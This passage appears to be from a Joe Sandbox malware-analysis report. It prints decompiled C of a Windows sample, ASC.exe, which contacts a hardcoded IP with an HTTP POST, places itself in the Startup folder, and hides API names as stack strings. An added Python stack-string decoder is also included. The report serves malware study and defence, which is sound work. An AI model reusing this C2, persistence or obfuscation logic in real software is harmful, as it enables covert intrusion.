    					_v124 = 0xbe;
    					_v126 = 0xbf;
    					_v128 = 0xbc;
    					_v130 = 0xbf;
    					_v146 = 0xe4;
    					_v132 = 0xbd;
    					_v148 = 0xcf;
    					_v120 = 0xbe;
    					_v122 = 0xbe;
    					_v134 = 0xb8;
    					_v150 = 0xac;
    					_v136 = 0xa3;
    					_v138 = 0xe9;
    					_v152 = 0xa5;
    					_v140 = 0xe1;
    					_v154 = 0xe3;
    					_v156 = 0xe7;
    					_v158 = 0xef;
    					_v160 = 0xe9;
    					_v162 = 0xcb;
    					_v164 = 0xac;
    					_v94 = 0xbb00bf;
    					_v108 = 0xea00ed;
    					_v144 = 0xe300fe;
    					_v166 = 0xe9;
    					_v168 = 0xe7;
    					_v170 = 0xe5;
    					_v172 = 0xe0;
    					_v174 = 0xac;
    					_v176 = 0xa0;
    					_v178 = 0xc0;
    					_v180 = 0xc1;
    					_v182 = 0xd8;
    					_v184 = 0xc4;
    					_v186 = 0xc7;
    					_v188 = 0xa4;
    					_v190 = 0xac;
    					_v192 = 0xba;
    					_v194 = 0xbf;
    					_v196 = 0xbf;
    					_v198 = 0xbb;
    					_v200 = 0xbf;
    					_v202 = 0xb9;
    					_v204 = 0xa3;
    					_v206 = 0xf8;
    					_v208 = 0xe5;
    					_v210 = 0xc7;
    					_v212 = 0xee;
    					_v220 = 0xe0;
    					_v224 = 0xfc;
    					_v214 = 0xe9;
    					_v226 = 0xcd;
    					_v228 = 0xac;
    					_v230 = 0xa5;
    					_v232 = 0xbd;
    					_v234 = 0xa2;
    					_v236 = 0xba;
    					_v238 = 0xac;
    					_v240 = 0xd8;
    					_v242 = 0xc2;
    					_v244 = 0xac;
    					_v246 = 0xff;
    					_v248 = 0xfb;
    					_v218 = 0xdb00e9;
    					_v222 = 0xfc;
    					_v250 = 0xe3;
    					_v252 = 0xe8;
    					_v268 = 0xb9;
    					_v254 = 0xe2;
    					_v270 = 0xa3;
    					_v256 = 0xe5;
    					_v272 = 0xed;
    					_v258 = 0xdb;
    					_v274 = 0xe0;
    					_v284 = 0xc1;
    					_t387 = 1;
    					_v262 = 0xa400ac;
    					_v266 = 0xbc00a2;
    					_v278 = 0xe000e5;
    					_v282 = 0xf600e3;
    					_v82 = 0;
    					_t234 =  *0x12e5968; // 0x0
    					_t235 =  *((intOrPtr*)(_t234 + 0x18))(E012C113A( &_v284), 1, 0, 0, 0);
    					 *0x12e59c0 = _t235;
    					if(_t235 == 0) {
    						L20:
    						 *_a8 = 0x50;
    						if(E012CC8AE(_a4, "192.243.101.124") == 0) {
    							L3:
    							return 0;
    						}
    						E012C1000(0x200, L"%S", _a4);
    						L22:
    						_t243 =  *0x12e5968; // 0x0
    						_t244 =  *((intOrPtr*)(_t243 + 0x14))( *0x12e59c0,  &_v1348, 0x50, 0);
    						 *0x12e59c4 = _t244;
    						if(_t244 == 0) {
    							goto L3;
    						}
    						_t323 = 0x50;
    						_v28 = _t323;
    						_t324 = 0x4f;
    						_v26 = _t324;
    						_t325 = 0x53;
    						_v24 = _t325;
    						_t326 = 0x54;
    						_v22 = _t326;
    						_v20 = 0;
    						_t245 =  *0x12e5968; // 0x0
    						_t246 =  *((intOrPtr*)(_t245 + 0x1c))(_t244,  &_v28, L"/index.html", 0, 0,  &_v292, 0);
    						 *0x12e59bc = _t246;
    						if(_t246 == 0) {
    							L19:
    							_t247 =  *0x12e5968; // 0x0
    							 *((intOrPtr*)(_t247 + 0x28))( *0x12e59c0);
    							goto L3;
    						}
    						_t249 =  *0x12e5968; // 0x0
    						 *((intOrPtr*)(_t249 + 0xc))(_t246, 0x2710, 0x2710, 0x927c0, 0x927c0);
    						return _t387;
    					}
    					_push( &_v320);
    					_t253 =  *0x12e5968; // 0x0
    					if( *((intOrPtr*)(_t253 + 4))() == 0) {
    						goto L20;
    					}
    					_t255 = _v312;
    					if(_t255 != 0) {
    						_v12 = _t255;
    						_v16 = 3;
    						_v8 = 0;
    					}
    					_t256 = _v316;
    					if(_t256 != 0) {
    						_v44 = _t256;
    						_push( &_v304);
    						_push( &_v52);
    						_push( &_v836);
    						_push( *0x12e59c0);
    						_t275 =  *0x12e5968; // 0x0
    						_v52 = 2;
    						_v48 = 0;
    						_v32 = _t387;
    						_v40 = 0;
    						_v36 = 0;
    						if( *((intOrPtr*)(_t275 + 0x20))() != 0) {
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							_t387 = 1;
    						}
    					}
    					if(_v320 != 0) {
    						_push( &_v304);
    						_push( &_v52);
    						_push( &_v836);
    						_push( *0x12e59c0);
    						_t270 =  *0x12e5968; // 0x0
    						_v52 = _t387;
    						_v48 = 3;
    						_v32 = _t387;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						if( *((intOrPtr*)(_t270 + 0x20))() != 0) {
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							_t387 = 1;
    						}
    					}
    					if(_v12 == 0) {
    						goto L20;
    					} else {
    						_t258 =  *0x12e5968; // 0x0
    						 *((intOrPtr*)(_t258 + 8))( *0x12e59c0, 0x26,  &_v16, 0xc);
    						_t380 = _a4;
    						E012C10F7(0x20, "%S", _v12);
    						_t261 = E012C1240(_a4, 0x3a);
    						if(_t261 == 0) {
    							 *_a8 = 0x1f90;
    						} else {
    							 *_t261 = 0;
    							E012C207D(_t261 + 1, "%d", _a8);
    						}
    						if(E012CC8AE(_t380, _t380) != 0) {
    							goto L22;
    						} else {
    							goto L19;
    						}
    					}
    				}
    				_t277 = E012C1195(_t336,  &_v320, "192.243.101.124", 0x34);
    				_pop(_t335);
    				 *0x12e5968 = _t277;
    				if(_t277 == 0 || E012D5B62(_t335, _t277) == 0) {
    					goto L3;
    				} else {
    					goto L4;
    				}
    			}

    APIs
    • _swscanf.LIBCMT ref: 012CCEA3
      • Part of subcall function 012D5B62: GetProcAddress.KERNEL32(00000000,?,192.243.101.124,00000034,?,00000200), ref: 012D5C05
      • Part of subcall function 012D5B62: GetProcAddress.KERNEL32(?,?), ref: 012D5C73
      • Part of subcall function 012D5B62: GetProcAddress.KERNEL32(?,?), ref: 012D5C9E
      • Part of subcall function 012D5B62: GetProcAddress.KERNEL32(?,?), ref: 012D5CCF
      • Part of subcall function 012D5B62: GetProcAddress.KERNEL32(?,?), ref: 012D5D07
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 91%
    			E012D92E0(void* __ebx, void* __edx, void* __eflags, intOrPtr* _a4, char* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
    				signed int _v8;
    				char _v32;
    				intOrPtr _v44;
    				char _v48;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t30;
    				signed int _t36;
    				signed int _t39;
    				void* _t42;
    				char _t46;
    				void* _t47;
    				void* _t49;
    				signed int _t52;
    				signed int _t55;
    				signed int _t56;
    				signed int _t59;
    				char* _t60;
    				signed int _t61;
    
    				_t58 = __edx;
    				_t47 = __ebx;
    				_t30 =  *0x12e2aa8; // 0x5ff9d198
    				_v8 = _t30 ^ _t61;
    				_t60 = _a8;
    				_t59 = 0x16;
    				E012D9AE7(__ebx,  &_v48, __edx, __eflags,  *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v48,  &_v32, _t59);
    				if(_t60 != 0) {
    					_t52 = _a12;
    					__eflags = _t52;
    					if(_t52 == 0) {
    						goto L1;
    					} else {
    						_push(_t47);
    						_t49 = _v44 - 1;
    						__eflags = _v48 - 0x2d;
    						_t39 = 0 | _v48 == 0x0000002d;
    						_t59 = _t39 + _t60;
    						__eflags = _t52 - 0xffffffff;
    						if(_t52 != 0xffffffff) {
    							_t55 = _t52 - _t39;
    							__eflags = _t55;
    						} else {
    							_t55 = _t52;
    						}
    						_t36 = E012D9981(_t59, _t55, _a16,  &_v48);
    						__eflags = _t36;
    						if(_t36 == 0) {
    							_t42 = _v44 - 1;
    							__eflags = _t49 - _t42;
    							_t56 = _t55 & 0xffffff00 | _t49 - _t42 < 0x00000000;
    							__eflags = _t42 - 0xfffffffc;
    							if(_t42 < 0xfffffffc) {
    								L14:
    								_t36 = L012D8B5E(_t60, _a12, _a16, _a20,  &_v48, 1, _a24);
    							} else {
    								__eflags = _t42 - _a16;
    								if(_t42 >= _a16) {
    									goto L14;
    								} else {
    									__eflags = _t56;
    									if(_t56 != 0) {
    										do {
    											_t46 =  *_t59;
    											_t59 = _t59 + 1;
    											__eflags = _t46;
    										} while (_t46 != 0);
    										 *((char*)(_t59 - 2)) = _t46;
    									}
    									_t36 = E012D911C( &_v48, _t60, _a12, _a16, 1, _a24);
    								}
    							}
    						} else {
    							 *_t60 = 0;
    						}
    						_pop(_t47);
    					}
    				} else {
    					L1:
    					 *(E012C22A2()) = _t59;
    					E012C390C();
    					_t36 = _t59;
    				}
    				return E012C8B82(_t36, _t47, _v8 ^ _t61, _t58, _t59, _t60);
    			}

    APIs
      • Part of subcall function 012D8CBF: __fltout2.LIBCMT ref: 012D8CEE
    • __fltout2.LIBCMT ref: 012D930B
      • Part of subcall function 012D9AE7: ___dtold.LIBCMT ref: 012D9B0D
      • Part of subcall function 012D9AE7: _$I10_OUTPUT.LIBCMT ref: 012D9B28
      • Part of subcall function 012D9981: _strlen.LIBCMT ref: 012D9A1C
    • __cftof2_l.LIBCMT ref: 012D9398
      • Part of subcall function 012D911C: _strlen.LIBCMT ref: 012D919A
      • Part of subcall function 012D911C: _strlen.LIBCMT ref: 012D91BE
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 95%
    			E012D8CBF(void* __eflags, intOrPtr* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
    				signed int _v8;
    				char _v32;
    				char _v48;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t26;
    				intOrPtr _t30;
    				intOrPtr _t33;
    				intOrPtr _t42;
    				void* _t56;
    				char* _t57;
    				intOrPtr _t58;
    				signed int _t59;
    
    				_t26 =  *0x12e2aa8; // 0x5ff9d198
    				_v8 = _t26 ^ _t59;
    				_t58 = _a16;
    				_t57 = _a8;
    				_t42 = 0x16;
    				E012D9AE7(_t42,  &_v48, _t56, __eflags,  *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v48,  &_v32, _t42);
    				if(_t57 != 0) {
    					_t30 = _a12;
    					__eflags = _t30;
    					if(_t30 == 0) {
    						goto L1;
    					}
    					__eflags = _t30 - 0xffffffff;
    					if(_t30 != 0xffffffff) {
    						_v48 - 0x2d = _t58;
    						_t36 = _t30 - (_v48 == 0x2d) - (_t58 > 0);
    						__eflags = _t30 - (_v48 == 0x2d) - (_t58 > 0);
    					} else {
    						_t36 = _t30;
    					}
    					_v48 - 0x2d = _t58;
    					_t33 = E012D9981((0 | _t58 > 0x00000000) + (0 | _v48 == 0x0000002d) + _t57, _t36, _t58 + 1,  &_v48);
    					__eflags = _t33;
    					if(_t33 == 0) {
    						_t33 = L012D8B5E(_t57, _a12, _t58, _a20,  &_v48, 0, _a24);
    					} else {
    						 *_t57 = 0;
    					}
    					L9:
    					return E012C8B82(_t33, _t42, _v8 ^ _t59, _t56, _t57, _t58);
    				}
    				L1:
    				 *((intOrPtr*)(E012C22A2())) = _t42;
    				E012C390C();
    				_t33 = _t42;
    				goto L9;
    			}

    APIs
    • __fltout2.LIBCMT ref: 012D8CEE
      • Part of subcall function 012D9AE7: ___dtold.LIBCMT ref: 012D9B0D
      • Part of subcall function 012D9AE7: _$I10_OUTPUT.LIBCMT ref: 012D9B28
      • Part of subcall function 012D9981: _strlen.LIBCMT ref: 012D9A1C
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 87%
    			E012D921F(void* __ebx, void* __edx, void* __eflags, intOrPtr* _a4, char* _a8, signed int _a12, signed int _a16, intOrPtr _a20) {
    				signed int _v8;
    				char _v32;
    				intOrPtr _v44;
    				char _v48;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t20;
    				signed int _t23;
    				signed int _t28;
    				void* _t36;
    				signed int _t37;
    				char* _t49;
    				signed int _t51;
    
    				_t48 = __edx;
    				_t36 = __ebx;
    				_t20 =  *0x12e2aa8; // 0x5ff9d198
    				_v8 = _t20 ^ _t51;
    				_t49 = _a8;
    				_t50 = 0x16;
    				_t23 = E012D9AE7(__ebx,  &_v48, __edx, __eflags,  *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v48,  &_v32, _t50);
    				if(_t49 != 0) {
    					_push(_t36);
    					_t37 = _a12;
    					__eflags = _t37;
    					if(_t37 != 0) {
    						_t24 = _t23 | 0xffffffff;
    						__eflags = _t37 - _t24;
    						if(_t37 != _t24) {
    							__eflags = _v48 - 0x2d;
    							_t24 = _t37 - (_v48 == 0x2d);
    							__eflags = _t37 - (_v48 == 0x2d);
    						}
    						_t50 = _a16;
    						__eflags = _v48 - 0x2d;
    						_t28 = E012D9981((0 | _v48 == 0x0000002d) + _t49, _t24, _v44 + _a16,  &_v48);
    						__eflags = _t28;
    						if(_t28 == 0) {
    							_t28 = E012D911C( &_v48, _t49, _t37, _t50, 0, _a20);
    						} else {
    							 *_t49 = 0;
    						}
    					} else {
    						 *(E012C22A2()) = _t50;
    						E012C390C();
    						_t28 = _t50;
    					}
    					_pop(_t36);
    				} else {
    					 *(E012C22A2()) = _t50;
    					E012C390C();
    					_t28 = _t50;
    				}
    				return E012C8B82(_t28, _t36, _v8 ^ _t51, _t48, _t49, _t50);
    			}

    APIs
    • __fltout2.LIBCMT ref: 012D924A
      • Part of subcall function 012D9AE7: ___dtold.LIBCMT ref: 012D9B0D
      • Part of subcall function 012D9AE7: _$I10_OUTPUT.LIBCMT ref: 012D9B28
      • Part of subcall function 012D9981: _strlen.LIBCMT ref: 012D9A1C
    • __cftof2_l.LIBCMT ref: 012D92C9
      • Part of subcall function 012D911C: _strlen.LIBCMT ref: 012D919A
      • Part of subcall function 012D911C: _strlen.LIBCMT ref: 012D91BE
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 58%
    			E012D0B07(void* __eax, int* __ebx, void* __edx) {
    				short* _t20;
    				void* _t28;
    				void* _t36;
    				char* _t40;
    				void* _t41;
    
    				_t36 = __edx;
    				if(__eax == 0) {
    					 *(_t41 + 0x68) = __ebx;
    					 *(_t41 + 0x70) = __ebx;
    					_t20 = E012C1CB1(L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup\\ASC.exe", 0x5c);
    					if(_t20 == __ebx) {
    						L10:
    						_push( *(_t41 + 0x6c));
    						return E01315B15(_t20, _t41);
    					}
    					_t20 =  &(_t20[1]);
    					 *(_t41 + 0x64) = _t20;
    					if(_t20 == 0) {
    						goto L10;
    					}
    					_t35 = _t41 + 0x68;
    					if(_t20 != 0) {
    						goto L10;
    					}
    					_push( *(_t41 + 0x70));
    					_push(__ebx);
    					_push(_t36);
    					_t40 = E01345D12(_t20);
    					if(RegQueryValueExW( *(_t41 + 0x6c),  *(_t41 + 0x64), __ebx, _t41 + 0x68, _t40, _t41 + 0x70) != 0 ||  *_t40 == 2) {
    						_push(_t40);
    						return E0133EFBF(_t26);
    					} else {
    						_t28 = E012C8BA0(_t40, __ebx,  *(_t41 + 0x70));
    						 *_t40 = 2;
    						_push( *(_t41 + 0x70));
    						_push(_t40);
    						_push( *(_t41 + 0x68));
    						_push(__ebx);
    						_push( *(_t41 + 0x64));
    						_push( *(_t41 + 0x6c));
    						return E0136B72C(_t28, _t35, _t41);
    					}
    				}
    				return 0;
    			}

    APIs
    • RegQueryValueExW.ADVAPI32(?,00000002,?,?,?,?), ref: 012D0B42
    • RegQueryValueExW.ADVAPI32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 012D0B64
    Strings
    • C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe, xrefs: 012D0B11
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 85%
    			E012C7C70(void* __ecx) {
    				char* _v8;
    				signed int _v12;
    				char _v16;
    				void* __edi;
    				void* __esi;
    				void* _t13;
    				intOrPtr* _t15;
    				signed int _t18;
    				signed int _t19;
    				void* _t26;
    				char _t27;
    				void* _t28;
    				char* _t36;
    				signed int _t37;
    				intOrPtr _t41;
    
    				_t26 = __ecx;
    				_t41 =  *0x12e6b2c; // 0x1
    				if(_t41 == 0) {
    					_t13 = E012C2EFF(__ecx);
    				}
    				_push(0x104);
    				_t36 = "C:\\Users\\angela\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ASC.exe";
    				_push(_t36);
    				_push(0);
    				 *0x12e39fc = 0;
    				_push(_t26);
    				E0133291B(_t13, _t36, _t41);
    				_t15 =  *0x12e6b34; // 0x3a36f8
    				 *0x12e3270 = _t36;
    				if(_t15 == 0) {
    					L4:
    					_v8 = _t36;
    					goto L5;
    				} else {
    					_v8 = _t15;
    					if( *_t15 != 0) {
    						L5:
    						E012C7AD6(_t26, _v8,  &_v16, 0, 0,  &_v12);
    						_t18 = _v12;
    						if(_t18 >= 0x3fffffff) {
    							L10:
    							_t19 = _t18 | 0xffffffff;
    							__eflags = _t19;
    							return _t19;
    						}
    						_t27 = _v16;
    						if(_t27 >= 0xffffffff) {
    							goto L10;
    						}
    						_t33 = _t18 << 2;
    						_t18 = (_t18 << 2) + _t27;
    						if(_t18 < _t27) {
    							goto L10;
    						}
    						_t18 = E012C8F8E(_t18);
    						_t37 = _t18;
    						_pop(_t28);
    						if(_t37 == 0) {
    							goto L10;
    						}
    						E012C7AD6(_t28, _v8,  &_v16, _t37, _t33 + _t37,  &_v12);
    						 *0x12e3254 = _v12 - 1;
    						 *0x12e3258 = _t37;
    						return 0;
    					}
    					goto L4;
    				}
    			}

    APIs
    • _parse_cmdline.LIBCMT ref: 012C7CC7
      • Part of subcall function 012C8F8E: Sleep.KERNEL32(00000000,00000001,012C1398,?,012C83EF,00000018,012E0B60,0000000C,012C847F,012C1398,00000000,?,012C245F,00000008,012E0A70,00000020), ref: 012C8FAF
    • _parse_cmdline.LIBCMT ref: 012C7D08
    Strings
    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe, xrefs: 012C7C8F, 012C7C94
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 61%
    			E012CD22E(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
    				signed int _v8;
    				signed int _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				char _v28;
    				char _v30;
    				short _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				char _v48;
    				void* __ebp;
    				signed int _t22;
    				_Unknown_base(*)()* _t24;
    				void* _t25;
    				signed int _t28;
    				void* _t31;
    				struct HINSTANCE__* _t34;
    
    				_t31 = __edx;
    				_push( &_v28);
    				_v28 = 0x67616d49;
    				_v24 = 0x706c6865;
    				_v20 = 0x6c6c642e;
    				_v16 = 0;
    				_v48 = 0x63656843;
    				_v44 = 0x6d75536b;
    				_v40 = 0x7070614d;
    				_v36 = 0x69466465;
    				_v32 = 0x656c;
    				_v30 = 0;
    				_t22 = E01366AD6( &_v28);
    				_t34 = _t22;
    				if(_t34 != 0) {
    					_t12 =  &_v48; // 0x63656843
    					_t24 = GetProcAddress(_t34, _t12);
    					if(_t24 != 0) {
    						_v12 = _v12 & 0x00000000;
    						_v8 = _v8 & 0x00000000;
    						_t25 =  *_t24(_a4, _a8,  &_v12,  &_v8);
    						_push(_t34);
    						return E013757F5(_t25, _t31, __edi);
    					}
    					_push(_t34);
    					return E0133E3CC(_t24, __edi);
    				}
    				_t28 = _t22 | 0xffffffff;
    				return _t28;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,CheckSumMappedFileImagehlp.dll,?,?), ref: 012CD28E
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
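The two names that E012CD22E passes to the loader and to GetProcAddress are never stored as plain strings in the binary; the function writes them into its stack frame as DWORD immediates (0x67616d49, 0x706c6865, ... and 0x63656843, 0x6d75536b, ...), which keeps them out of the import table and out of a simple string listing. The Python below is an added example, not part of this Joe Sandbox report or of the analysed sample: it transcribes the stores from the decompiled listing above (frame offset taken from the _vNN name, value, store width) and rebuilds the strings the way the CPU lays them out. The one assumption is that the untouched pad byte at _v29 is zero, which a live frame does not guarantee.

```python
# Stack-string decoder for the immediates seen in E012CD22E above.
# Stores transcribed from the decompiled function: (frame offset, value, width).
# Offsets follow the decompiler's _vNN naming, i.e. bytes below the frame base.
STACK_STORES = [
    (-28, 0x67616d49, 4),   # _v28
    (-24, 0x706c6865, 4),   # _v24
    (-20, 0x6c6c642e, 4),   # _v20
    (-16, 0x00000000, 1),   # _v16 = 0 (terminator)
    (-48, 0x63656843, 4),   # _v48
    (-44, 0x6d75536b, 4),   # _v44
    (-40, 0x7070614d, 4),   # _v40
    (-36, 0x69466465, 4),   # _v36
    (-32, 0x0000656c, 2),   # _v32 (short)
    (-30, 0x00000000, 1),   # _v30 = 0 (terminator)
]


def decode_stack_strings(stores):
    """Lay the immediates out in a byte buffer at their frame offsets,
    little-endian as x86 writes them, and split the buffer on NUL.

    Bytes no store touches (here the pad byte at _v29) are assumed zero;
    in a live frame they would hold whatever was there before the call."""
    base = min(off for off, _, _ in stores)
    end = max(off + width for off, _, width in stores)
    frame = bytearray(end - base)
    for off, value, width in stores:
        frame[off - base:off - base + width] = value.to_bytes(width, "little")
    return [chunk.decode("ascii") for chunk in frame.split(b"\x00") if chunk]


def dword_to_text(value, width=4):
    """Show one immediate as the characters it encodes, e.g. 0x67616d49 -> 'Imag'."""
    return value.to_bytes(width, "little").decode("ascii")


if __name__ == "__main__":
    for off, value, width in sorted(STACK_STORES):
        print(f"_v{-off:<3} {value:#010x} -> {dword_to_text(value, width)!r}")
    print(decode_stack_strings(STACK_STORES))
```

Run stand-alone it lists each store with its decoded characters and then prints the two recovered names, CheckSumMappedFile and Imagehlp.dll, which agrees with the GetProcAddress annotation at 012CD28E, where the plugin shows the two adjacent frame buffers run together. The same decoder applies to any function that builds names from immediates; only the transcribed store list changes.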
    C-Code - Quality: 82%
    			E012C2309(void* __eax, intOrPtr _a4) {
    				struct HINSTANCE__* _t3;
    
    				_push(L"mscoree.dll");
    				_t3 = E0131E896();
    				if(_t3 != 0) {
    					_t3 = GetProcAddress(_t3, "CorExitProcess");
    					if(_t3 != 0) {
    						return _t3->i(_a4);
    					}
    				}
    				return _t3;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,mscoree.dll,?,012C2341,012C1398,?,012C11C4,000000FF,0000001E,00000001,00000000,00000000,?,012C8F9F), ref: 012C2323
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd